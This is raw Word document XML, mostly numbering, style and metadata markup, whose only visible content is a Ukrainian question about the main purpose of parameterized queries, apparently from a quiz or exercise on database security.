    <w:p w14:paraId="23110029" w14:textId="1F727666" w:rsidR="00A10B9C" w:rsidRDefault="00A10B9C" w:rsidP="00A10B9C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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основна мета використання параметризованих запитів?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666B808C" w14:textId="2B332D39" w:rsidR="00A10B9C" w:rsidRPr="00A10B9C" w:rsidRDefault="00A10B9C" w:rsidP="00A10B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10B9C" w:rsidRPr="00A1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A09"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A18E2CFA"/>
    <w:lvl w:ilvl="0" w:tplc="2172969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89433B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="739EF3F2"/>
    <w:lvl w:ilvl="0" w:tplc="44FAB828">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="space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3D26BE3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="993AE50A"/>
    <w:lvl w:ilvl="0" w:tplc="B12A0E2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9202AA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3440DABA"/>
    <w:lvl w:ilvl="0" w:tplc="92568A8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7E70540"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A2540464"/>
    <w:lvl w:ilvl="0" w:tplc="48E299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CA240F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="04AEEEFA"/>
    <w:lvl w:ilvl="0" w:tplc="DC86C2F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101101"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DC66F3CE"/>
    <w:lvl w:ilvl="0" w:tplc="4EE2B67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97621FE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EF264DC0"/>
    <w:lvl w:ilvl="0" w:tplc="92AAFE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AA75BC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="535EC5B0"/>
    <w:lvl w:ilvl="0" w:tplc="29E818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7DC0B1C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7A020ECA"/>
    <w:lvl w:ilvl="0" w:tplc="0832A774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A5D2559"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8452AAD0"/>
    <w:lvl w:ilvl="0" w:tplc="0A1088B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81"/>
    <w:rsid w:val="000215B1"/>
    <w:rsid w:val="00094E56"/>
    <w:rsid w:val="00094FC4"/>
    <w:rsid w:val="000A2B8C"/>
    <w:rsid w:val="000C4535"/>
    <w:rsid w:val="002D3A08"/>
    <w:rsid w:val="00323C75"/>
    <w:rsid w:val="00470F3E"/>
    <w:rsid w:val="00591A7F"/>
    <w:rsid w:val="00631E4E"/>
    <w:rsid w:val="00744881"/>
    <w:rsid w:val="008F6D75"/>
    <w:rsid w:val="00915EA4"/>
    <w:rsid w:val="009E6723"/>
    <w:rsid w:val="00A10B9C"/>
    <w:rsid w:val="00AA68D9"/>
    <w:rsid w:val="00C941C4"/>
    <w:rsid w:val="00D566C9"/>
    <w:rsid w:val="00D84170"/>
    <w:rsid w:val="00D925AC"/>
    <w:rsid w:val="00F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34A6"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{90A8F252-2D69-4E39-85AE-F760CEF6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70"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a4">
    <w:name w:val="No Spacing"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="000215B1"/>
    <w:pPr>
      <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:i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Laichuk</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Artem Laichuk</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <cp:lastPrinted>2026-02-27T13:21:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-02-27T08:10:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-02-27T13:53:00Z</dcterms:modified>
</cp:coreProperties>
</file>